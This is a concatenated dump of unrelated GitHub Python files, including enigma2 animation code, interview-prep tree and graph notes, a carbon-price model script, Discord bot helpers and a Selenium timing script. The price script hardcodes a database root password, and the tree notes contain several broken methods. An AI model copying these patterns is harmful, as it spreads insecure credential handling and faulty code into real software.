2.0)\n#eBounceInterpolator()\n\tdef _buildInterpolator(self, attrib):\n\t\tinterpolator = eLinearInterpolator.create() #boring linear is the default\n\t\tkey = attrib.get(\"interpolate\", \"linear\")\n\t\tif key == \"accelerate\":\n\t\t\tif \"factor\" in attrib:\n\t\t\t\tinterpolator = eAcclerateInterpolator.create( float(attrib[\"factor\"]) )\n\t\t\telse:\n\t\t\t\tinterpolator = eAcclerateInterpolator.create()\n\t\telif key == \"decelerate\":\n\t\t\tif \"factor\" in attrib:\n\t\t\t\tinterpolator = eDecelerateInterpolator.create( float(attrib[\"factor\"]) )\n\t\t\telse:\n\t\t\t\tinterpolator = eDecelerateInterpolator.create()\n\t\telif key == \"overshoot\":\n\t\t\tif \"tension\" in attrib:\n\t\t\t\tinterpolator = eOvershootInterpolator.create( float(attrib[\"tension\"]) )\n\t\t\telse:\n\t\t\t\tinterpolator = eOvershootInterpolator.create()\n\t\telif key == \"bounce\":\n\t\t\tinterpolator = eBounceInterpolator.create()\n\n\t\treturn interpolator\n\n#eFloatAnimation(int64_t duration, float from, float to, bool reversed = false, ePtr interpolator=0)\n\tdef _buildFloatAnimation(self, item, duration, interpolator=0):\n\t\tattrs = item.attrib\n\t\tif \"interpolate\" in attrs:\n\t\t\tinterpolator = self._buildInterpolator(attrs)\n\t\tisReverse = item.tag == \"alpha_hide\"\n\t\tfromValue = float(attrs[\"val\"])\n\t\ttoValue = 1.0\n\t\tif isReverse:\n\t\t\treturn eFloatAnimation.create(duration, toValue, fromValue, False, interpolator)\n\t\telse:\n\t\t\treturn eFloatAnimation.create(duration, fromValue, toValue, False, interpolator)\n\n#ePointAnimation(int64_t duration, ePoint from, ePoint to, bool reversed = false, ePtr interpolator=0, bool isReverse=false, bool animateX=true, bool animateY=true)\n\tdef _buildPointAnimation(self, item, duration, interpolator=0):\n\t\tattrs = item.attrib\n\t\tif \"interpolate\" in attrs:\n\t\t\tinterpolator = self._buildInterpolator(attrs)\n\t\tisReverse = item.tag == \"position_hide\"\n\t\tanimateX = \"animateX\" in attrs\n\t\tanimateY = \"animateY\" in attrs\n\t\tif not animateX and not animateY:\n\t\t\tanimateX = animateY = True\n\n\t\tfactor = float(attrs[\"val\"])\n\t\tx = int( self._desktopSize.width() * factor )\n\t\ty = int( self._desktopSize.height() * factor )\n\n\t\tif isReverse:\n\t\t\tfromPos = ePoint()\n\t\t\ttoPos = ePoint(x,y)\n\t\telse:\n\t\t\tfromPos = ePoint(x,y)\n\t\t\ttoPos = ePoint()\n\t\treturn ePointAnimation.create(duration, fromPos, toPos, factor, False, interpolator, isReverse, animateX, animateY)\n\n#eSizeAnimation(int64_t duration, eSize from, eSize to, bool reversed = false, ePtr interpolator=0)\n\tdef _buildSizeAnimation(self, item, duration, interpolator=0):\n\t\tattrs = item.attrib\n\t\tif \"interpolate\" in attrs:\n\t\t\tinterpolator = self._buildInterpolator(attrs)\n\t\tisReverse = item.tag == \"size_hide\"\n\t\tanimateW = \"animateW\" in attrs\n\t\tanimateH = \"animateH\" in attrs\n\t\tcentered = \"centered\" in attrs\n\t\tif not animateW and not animateH:\n\t\t\tanimateW = animateH = True\n\t\tw, h = attrs[\"val\"].split(\",\")\n\t\tw, h = int(w), int(h)\n\t\tfromSize = eSize(w,h)\n\t\ttoSize = eSize()\n\t\treturn eSizeAnimation.create(duration, fromSize, toSize, False, interpolator, isReverse, animateW, animateH, centered)\n\n#eMatrixAnimation(int64_t duration, eMatrix4x4 from, eMatrix4x4 to, bool reversed = false, ePtr interpolator=0)\n\tdef _buildMatrixAnimation(self, item, duration, interpolator=0):\n\t\tattrs = item.attrib\n\t\tif \"interpolate\" in attrs:\n\t\t\tinterpolator = self._buildInterpolator(attrs)\n\t\tx,y = float(attrs.get(\"x\", \"0\")), float(attrs.get(\"y\", \"0\"))\n\t\t#z = float(attrs.get(\"z\", \"0\"))\n\t\tfromMatrix = eMatrix4x4.rotateX(x) * eMatrix4x4.rotateY(y)#z axis rotation is currently not suported * eMatrix4x4.rotateZ(z)\n\t\ttoMatrix = eMatrix4x4.identity()\n\t\treturn eMatrixAnimation.create(duration, fromMatrix, toMatrix, False, interpolator)\n","repo_name":"opendreambox/enigma2","sub_path":"usr/lib/enigma2/python/Components/ScreenAnimations.py","file_name":"ScreenAnimations.py","file_ext":"py","file_size_in_byte":6944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"30989693957","text":"\"\"\" Ch 4: Trees and Graphs ~~~~~~~~~~~~~~~~~~~~\n\n* Note that Worst and avg case times may vary\n* Ask lots of clarifying questions! \n* There are many types!\n\nGraphs:\n\t- \n\nTrees\n\t- are a type of graph\n\t- composed of nodes\n\t- has a root node\n\t- each node has 0 or more child nodes\n\t- and so on, recursively\n\nBinary Trees\n\t- A tree where each node has 0-2 children\n\t- 'leaf' is a node w/o children\n\nBinary Search Tree\n\t- A Binary tree is a binary serach tree if\n\tall left descendenc <= n < all right descendents.\n\t- True for each node n\n\t- Clarify where duplicate values should be\n\n\"Balanced\"\n\t- Not perfect, but more or less so\n\t- Approx O(log n) for `insert` and `find`\n\n\"Complete\"\n\t- If you filled it from left to right, as you should,\n\t- The right slot is missing, not the left slot\n\n\"Full Binary Tree\"\n\t- Each node has zero or two children\n\t- No nodes have only one child\n\n\"Perfect Binary Tree\"\n\t- Both full and complete\n\t- All leaf nodes at same level\n\t- If so, a perfect tree has 2^k - 1 nodes\n\n\"Min-Heap\"\n\t- \n\n\"\"\"\n\nclass Node:\n\t\"\"\" A general node for trees or graphs\n\t\t>>> n3 = Node('n3')\n\t\t>>> print(n3)\n\t\tLeaf n3\n\t\t>>> n2 = Node('n2', [n3]), \n\t\t>>> print(n2)\n\t\t(Node n2 [Leaf n3],)\n\t\t>>> n1 = Node('n1', children=[n2, Node('n4')])\n\t\t>>> print(n1)\n\t\tNode n1 [(Node n2 [Leaf n3],), Leaf n4]\n\t\"\"\"\n\n\tdef __init__(self, data, children=[]):\n\t\tself.data = data\n\t\tself.children = children\n\n\tdef __repr__(self):\n\t\t# return self.children\n\t\tif self.children == []:\n\t\t\treturn 'Leaf ' + str(self.data)\n\t\telse:\n\t\t\treturn 'Node ' + str(self.data) + ' ' + str(self.children)\n\n\tdef find_stack(self, data):\n\t\t\"\"\" Return node object w/ this data \n\t\tIterative solution (but can be recursive)\n\n\t\tUses a Stack - LIFO\n\t\t\n\t\tDepth First Search \n\t\t\"\"\"\n\n\t\t# Start a STACK to keep track of nodes to visit.\n\t\tto_visit = [self]\n\n\t\twhile to_visit:\n\t\t\t# Pop the last item on the list\n\t\t\tcurr = to_visit.pop()\n\n\t\t\tif curr.data == data:\n\t\t\t\treturn curr\n\n\t\t\t# Else, it is not them.\n\t\t\t# add children list to end of 'to visit' list\n\t\t\tto_visit.extend(curr.children) \n\n\t\t\t# If they do not have children, they just get popped\n\t\t\t# and you go to the next one in the stack...\n\n\t\tdef find_queue(self, data):\n\t\t\t\"\"\" Return node object w/ this data\n\t\t\tSimply by changing to queue\n\n\t\t\twe can do a FIFO\n\n\t\t\tBreadth First Search!! \n\t\t\t\"\"\"\n\n\t\t\t# Goal : get a higher ranking node\n\n\t\t\tto_visit = [self] # QUEUE\n\n\t\t\twhile to_visit:\n\t\t\t\tcurr = to_visit.pop(0) # Get the highest (first in queue)\n\n\t\t\t\tif curr.data == data:\n\t\t\t\t\treturn curr\n\n\t\t\t\t# Else, add all children to the queue\n\t\t\t\tto_visit.extend(curr.children)\n\n\nclass Tree:\n\t\"\"\" Class representing a Tree\n\n\t\t** EXPLAINATION **\n\t\tYou know that a Node is itself a Tree??\n\t\tThat means, it's a little 'extra' to make a Tree class at all.\n\n\t\tSo, here we want to make sure a single node has all\n\t\tthe functionality it needs. That is why Node defines\n\t\ta .find() method!\n\n\t\tAnd here, we wrote a find_in_tree method that literally\n\t\tjust calls the Node.find() method cuz we want to \n\t\tkeep the sexy encapsulation.\n\n\t\"\"\"\n\n\tdef __init__(self, root):\n\t\tself.root = root\n\n\tdef __repr__(self):\n\t\t\"\"\"Reader-friendly representation.\"\"\"\n\t\treturn \"\".format(root=self.root)\n\n\tdef find_in_tree(self, data):\n\t\t\"\"\"Return node object with this data.\n\n\t\tStart at root.\n\t\tUse the method from root to find the data\n\t\tReturn None if not found.\n\n\t\t\"\"\"\n\t\treturn self.root.find(data)\n\n\tdef list_nodes_recursive(self, node):\n\t\tprint(node.data)\n\t\tfor child in node.children:\n\t\t\tlist_nodes_recursive(child)\n\n\nclass BinaryNode:\n\t\"\"\" A Binary Search node for trees or graphs\n\n\t\t# Create root node:\n\t\t>>> bn = BinaryNode(0)\n\t\t>>> print(bn.data, bn.right, bn.left)\n\t\t0 None None\n\n\t\t# Add a new data - creates a new node & decides if it should go right or left:\n\t\t>>> bl = BinaryNode(-1)\n\t\t>>> bn.insert(-1)\n\t\t>>> bn.PrintTree()\n\t\t0\n\n\t\"\"\"\n\tdef __init__(self, data, left=None, right=None):\n\t\t# Doesnt take left and right because we must leave that to the \n\t\t# 'insert' method - that takes care of the ordering of the \n\t\t# new nodes when adding them to the tree.\n\n\t\tself.left = left\n\t\tself.right = right\n\t\tself.data = data\n\n\tdef __repr__(self):\n\t\t\"\"\"Debugging-friendly representation.\"\"\"\n\n\t\treturn \"\".format(data=self.data)\n\n\n\tdef insert(self, data):\n\t\t# Suppose the parent is 'self ' - the root\n\t\t# We want to add one child - new node with data\n\t\t# * Recursively * - with each recursive step, update the self.\n\t\t# Compare the value ' data ' of a new node with the \n\t\t\t# parent node ' self.data ' \n\t\t\t# and decides where to add it to the tree\n\n\t\tprint('self.data', self.data)\n\n\t\tif self.data != None: \n\n\t\t\t# Try the left side\t\t\n\t\t\tif data < self.data:\n\n\t\t\t\t# If left branch is empty, add new node to left\n\t\t\t\tif self.left == None:\n\t\t\t\t\tprint('self.left', self.left)\n\t\t\t\t\tself.left = BinaryNode(data)\n\t\t\t\t\tprint('self.left', self.left)\n\t\t\t\telse:\n\t\t\t\t\tself.left.insert(data) # Recursive call\n\n\t\t\telif data > self.data:\n\t\t\t\tif self.right == None:\n\t\t\t\t\tprint('self.right', self.right)\n\t\t\t\t\tself.right = BinaryNode(data)\n\t\t\t\t\tprint('self.right', self.right)\n\t\t\t\telse:\n\t\t\t\t\tprint('recursive, both branches are full', self.left, self.right)\n\t\t\t\t\tself.right.insert(data)\n\t\telse:\n\t\t\t# If self.data == None, or self.data == data, set self.data to new data\n\t\t\t# We are creating the head with the root?\n\n\n\n\t\t\t# Why: when we initialize the list, we set self but not self.data\n\t\t\t# SO it has an 'empty head'?\n\t\t\tself.data = data\n\n\n\n\tdef find(self, sought):\n\t\t\"\"\" Start at the node you're at ( where\n\t\t'self' is treated like a root, every time)\n\n\t\tUse a while loop \n\n\t\tGo through, looking left and right. \n\n\t\tUpdate curr in the 'right direction'\n\n\t\tReturn node with this data. \n\t\tStart at root and return None if not found\n\t\t\"\"\"\n\t\t# Start at the root\n\t\tcurr = self\n\n\t\twhile curr:\n\n\t\t\tprint('checking curr.data', curr.data)\n\n\t\t\tif curr.data == sought:\n\t\t\t\treturn curr\n\n\t\t\telif sought < curr.data:\n\t\t\t\tcurr = curr.left\n\n\t\t\telif sought > curr.data:\n\t\t\t\tcurr = curr.right\n\n\t\treturn \"None\"\n\n\n\n\n\tdef PrintTree(self):\n\t\tif self.left:\n\t\t\tself.left.PrintTree()\n\t\t\tprint(self.data)\n\t\tif self.right:\n\t\t\tself.right.PrintTree()\n\n\t# if __name__ == \"__main__\":\n\n\t# apple = BinaryNode(\"apple\")\n\t# ghost = BinaryNode(\"ghost\")\n\t# fence = BinaryNode(\"fence\", apple, ghost)\n\t# just = BinaryNode('just')\n\t# jackal = BinaryNode(\"jackal\", fence, just)\n\t# zebra = BinaryNode(\"zebra\")\n\t# pencil = BinaryNode(\"pencil\", None, zebra)\n\t# mystic = BinaryNode(\"mystic\")\n\t# pluto = BinaryNode(\"nerd\", mystic, pencil)\n\t# money = BinaryNode(\"money\", jackal, pluto)\n\n\t# print(money.find(\"nerd\"))\n\n\t# root = BinaryNode(12)\n\t# print(root)\n\n\t# root.insert(3)\n\t# root.insert(2)\n\t# root.insert(10)\n\t# root.insert(11)\n\n\n\t# import doctest\n\t# doctest.testmod()\n\n\t# Make a filesystem\n\t# resume = Node(\"resume.txt\", [])\n\t# recipes = Node(\"recipes.txt\", [])\n\t# jane = Node(\"jane/\", [resume, recipes])\n\t# server = Node(\"server.py\", [])\n\t# jessica = Node(\"jessica/\", [server])\n\t# users = Node(\"Users/\", [jane, jessica])\n\t# root = Node(\"/\", [users])\n\n\t# tree = Tree(root)\n\t# print(\"server.py = \", tree.find_in_tree(\"server.py\")) # Will find\n\t# print(\"style.css = \", tree.find_in_tree(\"style.css\")) # will not find\n\n\nclass TreeTraversals:\n\t\"\"\"\n\tTraversals:\n\t- In order traversal\n\t\t\tVisit the left branch, then current, then right\n\t- Pre-order traversal\n\t\t\tVisits the current node before its child nodes\n\t- Post-order traversal\n\t\t\tVisits the current node after its child nodes\n\t\"\"\"\n\tdef in_order_traversal(treeNode):\n\t\t\"\"\" Takes a TreeNode and visits the current nodes before its \n\t\t\tchild nodes\n\t\t\"\"\"\n\t\tif treeNode != None:\n\t\t\tin_order_traversal(node.left)\n\t\t\tvisit(node)\n\t\t\tin_order_traversal(node.right)\n\n\tdef pre_order_traversal(treeNode):\n\t\t\"\"\" Takes a TreeNode and visits the current nodes before its \n\t\t\tchild nodes\n\t\t\"\"\"\n\t\tif treeNode != None:\n\t\t\tvisit(node)\n\t\t\tpre_order_traversal(node.left)\n\t\t\tpre_order_traversal(node.right)\n\n\tdef post_order_traversal(treeNode):\n\t\t\"\"\" Takes a TreeNode and visits the current nodes after its \n\t\t\tchild nodes\n\n\t\t\tThe root will always be the last node visited.\n\t\t\"\"\"\n\t\tif treeNode != None:\n\t\t\t\n\t\t\tpre_order_traversal(node.left)\n\t\t\tpost_order_traversal(node.right)\n\t\t\tvisit(node)\n\n\n# if __name__ == \"__main__\":\n\t# import doctest\n\t# doctest.testmod()\n\n\t# Make a filesystem\n\t# resume = Node(\"resume.txt\", [])\n\t# recipes = Node(\"recipes.txt\", [])\n\t# jane = Node(\"jane/\", [resume, recipes])\n\t# server = Node(\"server.py\", [])\n\t# jessica = Node(\"jessica/\", [server])\n\t# users = Node(\"Users/\", [jane, jessica])\n\t# root = Node(\"/\", [users])\n\n\t# tree = Tree(root)\n\t# print(\"server.py = \", tree.find_in_tree(\"server.py\")) # Will find\n\t# print(\"style.css = \", tree.find_in_tree(\"style.css\")) # will not find\n\n\t# pass\n\n\n\nclass GraphNode:\n\n\tdef __init__(self, name, children=None):\n\t\tself.name = name\n\t\tself.children = children\n\n\tdef __repr__(self):\n\t\treturn f'{self.name}- c:{self.children}'\n\n\n\nclass Graph:\n\t\"\"\" Graph class must be used b/c you might not necessarily \n\t\treach all the nodes from a single GraphNode\n\t\"\"\"\n\n\tdef __init__(self, nodes=[]):\n\t\tself.nodes = nodes\n\n\tdef __repr__(self):\n\t\treturn f'ndz:{self.nodes}'\n\n\n\n\n\nif __name__ == \"__main__\":\n\tgn = GraphNode('gn')\n\tprint(gn)\n\n\tg = Graph()\n\tprint(g)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"liv-yaa/Py_Code_Challenges","sub_path":"CTCI_2020/trees-graphs-ch4.py","file_name":"trees-graphs-ch4.py","file_ext":"py","file_size_in_byte":9198,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"}
+{"seq_id":"26620838051","text":"import pandas as pd\nimport numpy as np\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom sqlalchemy import create_engine\n\nengine = create_engine('mysql+pymysql://root:shero@localhost/sheroDB', echo=True)\n\ndef data_from_csv():\n wti = pd.read_csv('data/WTI_20050630_20200417.csv')\n wti_after_2015 = wti[wti['date'] > '2015-01-11']\n #print(wti_after_2015.head())\n #print(wti_after_2015.describe())\n\n # KAU\n kau18 = pd.read_csv('data/KAU18.csv', header=0,\n names=['date', 'name', 'price', 'diff', 'diff_per', 'high_price',\n 'low_price', 'volume', 'transaction_price', 'weighted_average'])\n kau18_price = kau18[['date', 'price']]\n kau18_price.sort_values(by=['date'], ascending=True, inplace=True,\n kind='mergesort', ignore_index=True)\n day_count = [i for i in range(kau18_price.count()['date'])]\n kau18_price['day'] = day_count\n #print(kau18_price.describe())\n #print(kau18_price.tail())\n\n\n kau19 = pd.read_csv('data/KAU19.csv', header=0,\n names=['date', 'name', 'price', 'diff', 'diff_per', 'high_price',\n 'low_price', 'volume', 'transaction_price', 'weighted_average'])\n kau19_price = kau19[['date', 'price']]\n kau19_price.sort_values(by=['date'], ascending=True, inplace=True,\n kind='mergesort', ignore_index=True)\n day_count = [i for i in range(kau19_price.count()['date'])]\n kau19_price['day'] = day_count\n #print(kau19_price.describe())\n #print(kau19_price.tail())\n\n kau1819 = kau18_price.append(kau19_price, ignore_index=True)\n #print(kau1819)\n\n return (wti_after_2015, kau1819)\n\n\ndef data_from_xls():\n #ELECTRICITY\n elec = pd.read_excel('data/electricity_20140101_20201025.xlsx',\n names=['date', '1', '2', '3', '4', '5', '6', '7', '8'\n , '9', '10', '11', '12', '13', '14', '15', '16'\n , '17', '18', '19', '20', '21', '22', '23', '24'])\n elec_after_2015 = elec[elec['date']>'2015-01-11']\n elec_day = elec_after_2015.sum(axis=1)\n elec_after_2015['elec'] = elec_day\n elec_after_2015.drop(['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12',\n '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24' ], axis='columns', inplace=True)\n # print(elec_after_2015.head())\n\n return (elec_after_2015)\n\ndef scale(df):\n print('')\n\ndef struct_data(wti, elec, kau):\n #유가는 금융시장에서 매겨지기 때문에 시장이 쉬는 날에는 데이터가 없다.\n #전력은 매일 있다.\n #그래서 유가 데이터가 없는 날의 전력 데이터는 없애야 한다.\n df = pd.DataFrame()\n\n for index, row in kau.iterrows() :\n if not wti[wti['date']==row['date']].empty :\n #print(wti[wti['date']==row['date']]['WTI($/bbl)'].values[0])\n new_row = { 'date' : row['date'], 'day' : row['day'], 'price' : row['price'],'WTI($/bbl)' : wti[wti['date']==row['date']]['WTI($/bbl)'].values[0] }\n df = df.append(new_row, ignore_index=True)\n df.insert(4,'elec', 0)\n for index, row in df.iterrows() :\n if not elec[elec['date']==row['date']].empty :\n #print(elec[elec['date']==row['date']]['elec'].values[0])\n #new_row = {'elec' : elec[elec['date']==row['date']]['elec'].values[0]}\n #df.loc[index]['elec'] = (elec[elec['date']==row['date']]['elec'].values[0])\n df.loc[index,'elec'] = (elec[elec['date']==row['date']]['elec'].values[0])\n return df\n #print(df.describe())\n #print(df.info())\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\ndef build_model():\n model = keras.Sequential()\n model.add(Dense(16, input_dim = 3, activation='relu'))\n model.add(Dense(8, activation='relu'))\n model.add(Dense(4, activation='relu'))\n model.add(Dense(1, activation='sigmoid'))\n\n\n\n\nif __name__ == \"__main__\":\n wti, kau = data_from_csv()\n elec = data_from_xls()\n data = struct_data(wti, elec, kau)\n","repo_name":"2020-SKKU-S-HERO/mobius_adaptation","sub_path":"database/price_pred_model.py","file_name":"price_pred_model.py","file_ext":"py","file_size_in_byte":4005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"18252264290","text":"import discord\nimport json\nfrom load_config import load_config\n\nclass Utilies():\n def __init__(self, bot):\n self.bot = bot\n \n async def id_check(self, interaction:discord.Interaction):\n data = load_config()\n if str(interaction.user.id) not in data.owner_ids:\n return False\n else:\n return True\n \n async def save_ids(self, msg_id, chnl_id):\n with open(\"assets/config.json\", \"r\") as f:\n data = json.load(f)\n\n data[\"categories\"][\"channel_id\"] = str(chnl_id)\n data[\"categories\"][\"message_id\"] = str(msg_id)\n\n with open(\"assets/config.json\", \"w\") as f:\n json.dump(data, f, indent=4)\n \n async def user_to_id(self, chnl):\n with open('assets/tickets.json', 'r') as f:\n data = json.load(f)\n \n for value in data.values():\n if value.get('channel_id') == chnl:\n user = value.get('author')\n return user\n\n return None\n","repo_name":"FlickNoJutsu/pyticketbot","sub_path":"core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"15191062955","text":"from selenium import webdriver\r\n# This is a relatively simple response time tester that uses Selenium to retrieve both front and back end response times\r\n# Chrome web driver interface\r\n\r\nPATH = r\"Your chromedriver.exe location\"\r\nhyperlink = \"Whatever site you want to test the response times of\"\r\ndriver = webdriver.Chrome(PATH)\r\ndriver.get(hyperlink)\r\n\r\n# Use Navigation Timing API to calculate the timings that matter the most\r\n\r\nnavigationStart = driver.execute_script(\"return window.performance.timing.navigationStart\")\r\nresponseStart = driver.execute_script(\"return window.performance.timing.responseStart\")\r\ndomComplete = driver.execute_script(\"return window.performance.timing.domComplete\")\r\n\r\n# Calculate the performance\r\nbackendPerformance_calc = responseStart - navigationStart\r\nfrontendPerformance_calc = domComplete - responseStart\r\n\r\nprint(\"Back End: %s\" % backendPerformance_calc + \"ms\")\r\nprint(\"Front End: %s\" % frontendPerformance_calc + \"ms\")\r\n\r\ndriver.quit()","repo_name":"tdotmich/Automation","sub_path":"NavigationTestGit.py","file_name":"NavigationTestGit.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"7262957831","text":"# %% [markdown]\n#\n# This example shows how to use `CompositeExpr` to create a custom numerical expression which can\n# be used in slimfit fitting.\n#\n# In this particular example we fit data to a dampened harmonic oscillator, where the time-evolution\n# of the system is solved by `scipy.integrate.solve_ivp`.\n\nfrom __future__ import annotations\n\nimport numpy as np\nimport proplot as pplt\nfrom scipy.integrate import solve_ivp\nfrom sympy import Symbol, Expr, symbols\n\nfrom slimfit import Model, Parameters\nfrom slimfit.fit import Fit\nfrom slimfit.numerical import NumExpr, to_numerical\nfrom slimfit.base import CompositeExpr\n\n\n# %%\n\n# %% [markdown]\n#\n# Generate the GT data to fit the damped harmonic oscillator to, and add some noise.\n\n\ndef ode(x, y):\n return np.sin(2 * np.pi * 0.2 * x) * np.exp(-0.1 * x)\n\n\nnum = 100\nt_eval = np.linspace(0.0, 25, num=num, endpoint=True)\nsol = solve_ivp(ode, (0.0, 25), np.array([-1]), t_eval=t_eval)\n\nydata = sol.y + np.random.normal(0, 0.05, size=num)\ndata = {\"y\": ydata, \"t\": t_eval}\n\n# %%\n\n# %% [markdown]\n#\n# `CompositeExpr` can be subclassed to create a custom numerical expression. The subclass must\n# implement the `__call__` method, which returns a (dictionary of) the numerical values of the\n# expression. In this example, we use `solve_ivp` to solve the ODE, and return the solution at the\n# specified time points.\n#\n# Because the `__init__` method takes an additional `domain` argument, the `to_numerical` method\n# must also be implemented correctly.\n\n\nclass IVPNumExpr(CompositeExpr):\n def __init__(\n self,\n t: Symbol | NumExpr | Expr,\n freq: Symbol | NumExpr | Expr,\n damping: Symbol | NumExpr | Expr,\n y0: Symbol | NumExpr | Expr,\n domain: tuple[float, float],\n ):\n expr = {\"t\": t, \"freq\": freq, \"damping\": damping, \"y0\": y0}\n self.domain = domain\n super().__init__(expr)\n\n def __call__(self, *args, **kwargs) -> np.ndarray:\n result = super().__call__(**kwargs)\n\n sol = solve_ivp(\n self.grad_func,\n self.domain,\n np.array([result[\"y0\"]]),\n t_eval=result[\"t\"],\n args=(result[\"freq\"], result[\"damping\"]),\n )\n\n return sol.y\n\n def to_numerical(self):\n num_expr = {k: to_numerical(expr) for k, expr in self.items()}\n instance = IVPNumExpr(**num_expr, domain=self.domain)\n\n return instance\n\n @staticmethod\n def grad_func(x, y, freq, damping):\n return np.sin(2 * np.pi * freq * x) * np.exp(-damping * x)\n\n\n# %%\n\n# %% [markdown]\n#\n# The resulting class can now be used in slimfit fitting, taking any symbol or expr as arguments for\n# the args `t, f, d, y0`, or it can be embedded in a larger model.\n\nt, f, d, y0, y = symbols(\"t f d y0 y\")\nivp = IVPNumExpr(t, f, d, y0, domain=(0.0, 25.0))\n\nmodel = Model({y: ivp})\n\n# Fix frequency at GT value to ensure fit converges\nguess = {\"f\": 0.2, \"d\": 0.5, \"y0\": -1.0}\nparameters = Parameters.from_symbols(ivp.symbols, guess).replace(\"f\", fixed=True)\n\nfit = Fit(model, parameters, data)\nresult = fit.execute()\n\nprint(result.parameters)\n\n# %%\n\nfig, ax = pplt.subplots()\nax.scatter(t_eval, ydata.flatten())\nax.plot(t_eval, ivp(t=t_eval, **parameters.guess).T, color=\"r\")\nax.plot(t_eval, ivp(t=t_eval, **result.parameters).T, color=\"k\")\npplt.show()\n","repo_name":"Jhsmit/slimfit","sub_path":"docs/examples/custom_numexpr_ivp.py","file_name":"custom_numexpr_ivp.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"25798884442","text":"'''\n1\n5 3\n0 0 1 1 1\n1 1 1 1 0\n0 0 1 0 0\n0 1 1 1 1\n1 1 1 0 1\n'''\ndef puzzle_count(matrix, target_num) :\n total_sum_list = []\n for row in matrix:\n total_sum = 0\n for i in range(n):\n if row[i] == 1:\n total_sum += 1\n else:\n total_sum_list.append(total_sum)\n total_sum = 0\n\n total_sum_list.append(total_sum)\n return total_sum_list.count(target_num)\n\nt = int(input())\nfor case in range(1,t+1):\n n,k = map(int, input().split())\n matrix = [list(map(int, input().split())) for _ in range(n)]\n result = puzzle_count(matrix,k) + puzzle_count(list(zip(*matrix[::-1])),k)\n\n print(f'#{case}', result)","repo_name":"00purplecandy00/Algorithm-Test-03","sub_path":"2200072/어디에단어가들어갈수있을까.py","file_name":"어디에단어가들어갈수있을까.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"36"}
+{"seq_id":"19725076852","text":"\"\"\"\n \t*************************** \n \t--------EveIDE_LIGHT-------- \n \t Author: Adancurusul\n \t Date: 2021-07-15 09:04:18\n \t LastEditors: Adancurusul\n \t LastEditTime: 2021-07-31 14:08:49\n \t Github: https://github.com/Adancurusul\n \t Email: adancurusul@gmail.com\n\n \t***************************\n \"\"\"\nimport re\n\nrgl_exp1 = r''' \n ((VOID)|(void)|(char)|(short)|(int)|(float)|(long)|(double)) # 识别函数返回值类型\n (\\s*(\\*)?\\s*) # 识别返回值是否为指针类型以及中间是否包含空格\n (\\w+) # 识别函数名\n ((\\s*)(\\()(\\n)?) # 函数开始小括号\n ((\\s*)?(const)?(\\s*)? # 参数前是否有const\n ((void)|(char)|(short)|(int)|(float)|(long)|(double))? # 参数类型\n (\\s*)(\\*)?(\\s*)?(restrict)?(\\s*)?(\\w+)(\\s*)?(\\,)?(\\n)?(.*)?)?# 最后的*表示有多个参数\n ((\\s*)(\\))(\\n)?) # 函数结束小括号\n '''\n\nrgl_exp12 = r''' \n ((VOID)|(void)|(char)|(short)|(int)|(float)|(long)|(double)) # 识别函数返回值类型\n (\\s*(\\*)?\\s*) # 识别返回值是否为指针类型以及中间是否包含空格\n (\\w+) # 识别函数名\n ((\\s*)(\\()(\\n)?) # 函数开始小括号\n (?P(.+)?)\n ((\\s*)(\\))(\\n)?) # 函数结束小括号\n ((\\s*)(\\{)(\\n)?)\n '''\ncompileStrA = r'((VOID)|(void)|(char)|(short)|(int)|(float)|(long)|(double))(\\s*(\\*)?\\s*)(\\w+)((\\s*)(\\()(\\n)?)(.+)?((\\s*)(\\))(\\n)?)((\\s*)(\\{)(\\n)?)'\ncompileStrB = r\"((VOID)|(void)|(char)|(short)|(int)|(float)|(long)|(double))(\\s*(\\*)?\\s*)(\\w+)((\\s*)(\\()(\\n)?)((\\s*)?(const)?(\\s*)?((void)|(char)|(short)|(int)|(float)|(long)|(double))?(\\s*)(\\*)?(\\s*)?(restrict)?(\\s*)?(\\w+)(\\s*)?(\\,)?(\\n)?(.*)?)?((\\s*)(\\))(\\n)?)\"\ndef get1stSymPos( s, fromPos=0):\n g_DictSymbols = {'\"': '\"', '/*': '*/', '//': '\\n'}\n listPos = [] # 位置,符号\n for b in g_DictSymbols: \n pos = s.find(b, fromPos)\n listPos.append((pos, b)) # 插入位置以及结束符号\n minIndex = -1 # 最小位置在listPos中的索引\n index = 0 # 索引\n while index < len(listPos):\n pos = listPos[index][0] # 位置\n if minIndex < 0 and pos >= 0: # 第一个非负位置\n minIndex = index\n if 0 <= pos < listPos[minIndex][0]: # 后面出现的更靠前的位置\n minIndex = index\n index = index + 1\n if minIndex == -1: # 没找到\n return (-1, None)\n else:\n return (listPos[minIndex])\n\ndef rmCommentsInCFile(s):\n g_DictSymbols = {'\"': '\"', '/*': '*/', '//': '\\n'}\n\n if not isinstance(s, str):\n raise TypeError(s)\n fromPos = 0\n while (fromPos < len(s)):\n result = get1stSymPos(s, fromPos)\n\n if result[0] == -1: # 没有符号了\n return s\n else:\n endPos = s.find(g_DictSymbols[result[1]], result[0] + len(result[1]))\n if result[1] == '//': # 单行注释\n if endPos == -1: # 没有换行符也可以\n endPos = len(s)\n s = s.replace(s[result[0]:endPos], ' ', 1)\n fromPos = result[0]\n elif result[1] == '/*': # 区块注释\n if endPos == -1: # 没有结束符就报错\n raise ValueError(\"块状注释未闭合\")\n s = s.replace(s[result[0]:endPos + 2], ' ', 1)\n fromPos = result[0]\n else: # 字符串\n if endPos == -1: # 没有结束符就报错\n raise ValueError(\"符号未闭合\")\n fromPos = endPos + len(g_DictSymbols[result[1]])\n return 